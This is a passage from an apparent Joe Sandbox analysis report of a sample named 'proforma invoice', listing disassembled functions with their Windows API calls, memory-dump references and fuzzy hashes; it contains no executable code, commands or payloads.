                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: _wcslen$FileName$OpenSave
                  • String ID: X
                  • API String ID: 83654149-3081909835
                  • Opcode ID: 217b5cdf11f560fac54d27fa4425f343690791ba4e65b4a3d7ffd6b12d6d78f8
                  • Instruction ID: 87c8c2b9237b725ba333b9a32a0edeb118306485bf0acadda23752a494499c69
                  • Opcode Fuzzy Hash: 217b5cdf11f560fac54d27fa4425f343690791ba4e65b4a3d7ffd6b12d6d78f8
                  • Instruction Fuzzy Hash: A9E1C0319083418FD724DF24C991AAEB7E5FF85310F1489ADF8999B2A2DB30DD45CB92
                  Function 00AB920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00AB9BB2
                  • BeginPaint.USER32(?,?,?), ref: 00AB9241
                  • GetWindowRect.USER32(?,?), ref: 00AB92A5
                  • ScreenToClient.USER32(?,?), ref: 00AB92C2
                  • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00AB92D3
                  • EndPaint.USER32(?,?,?,?,?), ref: 00AB9321
                  • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00AF71EA
                    • Part of subcall function 00AB9339: BeginPath.GDI32(00000000), ref: 00AB9357
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                  • String ID:
                  • API String ID: 3050599898-0
                  • Opcode ID: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
                  • Instruction ID: e376b96954ac5b109e73b17dd61faa47ce4c2b230ae0fea04d8d55d38d919700
                  • Opcode Fuzzy Hash: baab8c285dc236cc055611b23d5437a6747983517a7f8b012a08dc8aae41cdd1
                  • Instruction Fuzzy Hash: 90418D71104200AFD711DF68C885FBB7BB8EB55320F140669FAA9972B2CB319846DB61
                  Function 00B107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON
                  Download Yara Rule
                  APIs
                  • InterlockedExchange.KERNEL32(?,000001F5), ref: 00B1080C
                  • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00B10847
                  • EnterCriticalSection.KERNEL32(?), ref: 00B10863
                  • LeaveCriticalSection.KERNEL32(?), ref: 00B108DC
                  • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 00B108F3
                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 00B10921
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                  • String ID:
                  • API String ID: 3368777196-0
                  • Opcode ID: 966c6af6bf28883432f426b259efea20ca1e0cfd48400e04a17ba0330ba871cc
                  • Instruction ID: 7322cb343e6c08fe5c5e689a0abeb13b11f52bf1a842abcd0bc1b1ee5f435a87
                  • Opcode Fuzzy Hash: 966c6af6bf28883432f426b259efea20ca1e0cfd48400e04a17ba0330ba871cc
                  • Instruction Fuzzy Hash: 49418D71900205EFDF14AFA4DD85AAA77B9FF04310F1440A9ED04AB297DB74DEA0DBA0
                  Function 00B381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON
                  Download Yara Rule
                  APIs
                  • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,00AFF3AB,00000000,?,?,00000000,?,00AF682C,00000004,00000000,00000000), ref: 00B3824C
                  • EnableWindow.USER32(00000000,00000000), ref: 00B38272
                  • ShowWindow.USER32(FFFFFFFF,00000000), ref: 00B382D1
                  • ShowWindow.USER32(00000000,00000004), ref: 00B382E5
                  • EnableWindow.USER32(00000000,00000001), ref: 00B3830B
                  • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 00B3832F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Window$Show$Enable$MessageSend
                  • String ID:
                  • API String ID: 642888154-0
                  • Opcode ID: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
                  • Instruction ID: 2c5ec1deb5e11c205b087170914ecedad12fc3b272e1bc6c310f3e5710e467dd
                  • Opcode Fuzzy Hash: 8491bd1fc6e1a381d339ca4d098ec915e422c3dc103b4e49e271f72ab7cd6f10
                  • Instruction Fuzzy Hash: 8F418334601744AFDB12CF19DC99BA57BE0FB4A714F2841E9FA085B262CB31A842CF52
                  Function 00B04C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON
                  Download Yara Rule
                  APIs
                  • IsWindowVisible.USER32(?), ref: 00B04C95
                  • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B04CB2
                  • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B04CEA
                  • _wcslen.LIBCMT ref: 00B04D08
                  • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B04D10
                  • _wcsstr.LIBVCRUNTIME ref: 00B04D1A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                  • String ID:
                  • API String ID: 72514467-0
                  • Opcode ID: 787cf8d7ab933037955f0d03b6a4077eac44674c535b6b63d7bb945a26d12998
                  • Instruction ID: d1bdce861d0fb25626cbed6feeed020533ef68e9a78ff6c06e3a906a5348f271
                  • Opcode Fuzzy Hash: 787cf8d7ab933037955f0d03b6a4077eac44674c535b6b63d7bb945a26d12998
                  • Instruction Fuzzy Hash: 6D21F2B2204200BBEB255B69AD4AE7F7FDCDF45750F1081B9F905DB192EB61DC0097A0
                  Function 00B1581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AA3A97,?,?,00AA2E7F,?,?,?,00000000), ref: 00AA3AC2
                  • _wcslen.LIBCMT ref: 00B1587B
                  • CoInitialize.OLE32(00000000), ref: 00B15995
                  • CoCreateInstance.OLE32(00B3FCF8,00000000,00000001,00B3FB68,?), ref: 00B159AE
                  • CoUninitialize.OLE32 ref: 00B159CC
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                  • String ID: .lnk
                  • API String ID: 3172280962-24824748
                  • Opcode ID: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
                  • Instruction ID: 844e7375c0cd7473bb951f20f99b6e122d023611b205b7c6b7424fa0a33bec40
                  • Opcode Fuzzy Hash: 4feb3de6a24c61ae859986c89c87e06af2e4ceb0e629c1f49ace77e44963e82b
                  • Instruction Fuzzy Hash: C8D15471608601DFC724DF24C580A6EBBE5EF89710F54889DF88A9B261DB31ED85CB92
                  Function 00B0175D Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B00FCA
                    • Part of subcall function 00B00FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B00FD6
                    • Part of subcall function 00B00FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B00FE5
                    • Part of subcall function 00B00FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B00FEC
                    • Part of subcall function 00B00FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B01002
                  • GetLengthSid.ADVAPI32(?,00000000,00B01335), ref: 00B017AE
                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B017BA
                  • HeapAlloc.KERNEL32(00000000), ref: 00B017C1
                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00B017DA
                  • GetProcessHeap.KERNEL32(00000000,00000000,00B01335), ref: 00B017EE
                  • HeapFree.KERNEL32(00000000), ref: 00B017F5
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                  • String ID:
                  • API String ID: 3008561057-0
                  • Opcode ID: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
                  • Instruction ID: e39c49ac4f8ceac8e79d166f3e2e01bc3cbb35e8c9c9e6ffe046bc9a06ab3c63
                  • Opcode Fuzzy Hash: 17c42430e93e94a151fbde532b3d5411b00fabdfe65f87dcb4e025ccceb3a87f
                  • Instruction Fuzzy Hash: C711BEB6500605FFDB18DFA8CC49BAE7FE9EB45355F204898F482A7290CB35AD40DB60
                  Function 00B014CE Relevance: 9.1, APIs: 6, Instructions: 64processCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B014FF
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00B01506
                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B01515
                  • CloseHandle.KERNEL32(00000004), ref: 00B01520
                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B0154F
                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00B01563
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                  • String ID:
                  • API String ID: 1413079979-0
                  • Opcode ID: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
                  • Instruction ID: 062ba48f98698b1e6970369b25e1085fe748ca6221e4aa7d43c8605987076d57
                  • Opcode Fuzzy Hash: 8ccf9af51fc2958f50e1fa1abbba18b3a7062eadff2c026fe56306b396f2b5d0
                  • Instruction Fuzzy Hash: F7114472500209ABDB11CFA8DD49BDE7FA9EB48708F144064FA05A21A0C7718E649B60
                  Function 00AC3382 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,00AC3379,00AC2FE5), ref: 00AC3390
                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00AC339E
                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00AC33B7
                  • SetLastError.KERNEL32(00000000,?,00AC3379,00AC2FE5), ref: 00AC3409
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLastValue___vcrt_
                  • String ID:
                  • API String ID: 3852720340-0
                  • Opcode ID: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
                  • Instruction ID: 49c33c85c99fa684014fa417ef24a98491c63c9acd110520660b7265e60143fc
                  • Opcode Fuzzy Hash: dc5c6d5caefdcd528137150432eaaff4917ace8cf0c5684b0d8b74db885714cc
                  • Instruction Fuzzy Hash: EA01D83360D351BEAF152BB47D95F6B2E94EB15379732822DF410862F0EF554D016688
                  Function 00AD2D74 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • GetLastError.KERNEL32(?,?,00AD5686,00AE3CD6,?,00000000,?,00AD5B6A,?,?,?,?,?,00ACE6D1,?,00B68A48), ref: 00AD2D78
                  • _free.LIBCMT ref: 00AD2DAB
                  • _free.LIBCMT ref: 00AD2DD3
                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DE0
                  • SetLastError.KERNEL32(00000000,?,?,?,?,00ACE6D1,?,00B68A48,00000010,00AA4F4A,?,?,00000000,00AE3CD6), ref: 00AD2DEC
                  • _abort.LIBCMT ref: 00AD2DF2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ErrorLast$_free$_abort
                  • String ID:
                  • API String ID: 3160817290-0
                  • Opcode ID: 89de516f4a4b50e9013150017207bb8952154e2279bedce949c68b11d4629934
                  • Instruction ID: c54e91e07d85fd802926f749a39a06047081a0f2575a4e33a27810297ed91b6b
                  • Opcode Fuzzy Hash: 89de516f4a4b50e9013150017207bb8952154e2279bedce949c68b11d4629934
                  • Instruction Fuzzy Hash: F1F0A93654460067D71227746D0AB5E39666BF27A1F344417F8A7A33D1EE748901D361
                  Function 00B38A24 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00AB9639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AB9693
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96A2
                    • Part of subcall function 00AB9639: BeginPath.GDI32(?), ref: 00AB96B9
                    • Part of subcall function 00AB9639: SelectObject.GDI32(?,00000000), ref: 00AB96E2
                  • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00B38A4E
                  • LineTo.GDI32(?,00000003,00000000), ref: 00B38A62
                  • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00B38A70
                  • LineTo.GDI32(?,00000000,00000003), ref: 00B38A80
                  • EndPath.GDI32(?), ref: 00B38A90
                  • StrokePath.GDI32(?), ref: 00B38AA0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                  • String ID:
                  • API String ID: 43455801-0
                  • Opcode ID: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
                  • Instruction ID: 873cf03a549bc195a67fb5b3990a747f52bab3bc1ce7848e2f242fa68114fcdd
                  • Opcode Fuzzy Hash: a5bb812400ce17985c8499ba01f1a8daf532209704d24b374ba7e080cfd907b8
                  • Instruction Fuzzy Hash: 41111B7600014CFFDF129F98DC88EAA7FACEB08350F108052BA19AA1A1CB719D55DFA0
                  Function 00B051FD Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                  Download Yara Rule
                  APIs
                  • GetDC.USER32(00000000), ref: 00B05218
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00B05229
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00B05230
                  • ReleaseDC.USER32(00000000,00000000), ref: 00B05238
                  • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00B0524F
                  • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00B05261
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
                  • Instruction ID: 72f6894503cdf0bfd378e1383b8ca2a9914143ea7a4ad117161c6d38e59f0b33
                  • Opcode Fuzzy Hash: c58823e0f39782b1732ed2ed2117218cb3c8c7e19fc219584e1700df38a0f295
                  • Instruction Fuzzy Hash: 0E014F75A00718BBEB109BE59C49A5EBFB8EF48751F144065FA04F7291DA709800CFA0
                  Function 00AA1BC3 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AA1BF4
                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 00AA1BFC
                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AA1C07
                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AA1C12
                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 00AA1C1A
                  • MapVirtualKeyW.USER32(00000012,00000000), ref: 00AA1C22
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Virtual
                  • String ID:
                  • API String ID: 4278518827-0
                  • Opcode ID: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
                  • Instruction ID: 01b7055dd971590273a8bee69076f1ac98db2d6d4a9f8f5b7555e5f0cdd218b0
                  • Opcode Fuzzy Hash: ab900a3b82fe12a4a4da786696817e433d2923ddcc1ec22fe47ad9fe46c53865
                  • Instruction Fuzzy Hash: B00167B0902B5ABDE3008F6A8C85B56FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                  Function 00B0EB20 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                  Download Yara Rule
                  APIs
                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B0EB30
                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B0EB46
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00B0EB55
                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB64
                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB6E
                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B0EB75
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                  • String ID:
                  • API String ID: 839392675-0
                  • Opcode ID: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
                  • Instruction ID: bc247652eecefb6e0e75e4552daf319cb62300950205f90a5d83f8595c85f31f
                  • Opcode Fuzzy Hash: ff690e64e100207956251ddf60e405dce1509e784e7e3b2689d96f21a825dec9
                  • Instruction Fuzzy Hash: B7F01772240558BBE7215BA29C0EEAF3E7CEBCAB11F104158F611F20919BA05A0197B5
                  Function 00AF7439 Relevance: 9.0, APIs: 6, Instructions: 37windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetClientRect.USER32(?), ref: 00AF7452
                  • SendMessageW.USER32(?,00001328,00000000,?), ref: 00AF7469
                  • GetWindowDC.USER32(?), ref: 00AF7475
                  • GetPixel.GDI32(00000000,?,?), ref: 00AF7484
                  • ReleaseDC.USER32(?,00000000), ref: 00AF7496
                  • GetSysColor.USER32(00000005), ref: 00AF74B0
                  Memory Dump Source
                  • Source File: 00000000.00000002.1654790446.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true
                  • Associated: 00000000.00000002.1654226399.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654837156.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654872970.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1654887705.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_aa0000_proforma invoice.jbxd
                  Similarity
                  • API ID: ClientColorMessagePixelRectReleaseSendWindow
                  • String ID:
                  • API String ID: 272304278-0
                  • Opcode ID: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
                  • Instruction ID: 99106892b2df201128ecc39567570ee64cb0d2f2a1f5a0725c84a6f8ccc0238b
                  • Opcode Fuzzy Hash: 1c9314447502f11d8a58b750f1514aebef845fa338663375d1438d3bcc2bd35b
                  • Instruction Fuzzy Hash: 88012831400619EFEB515FA8DC0ABAE7FB5FB04312F610164FA15A31A1CF311E51AB50
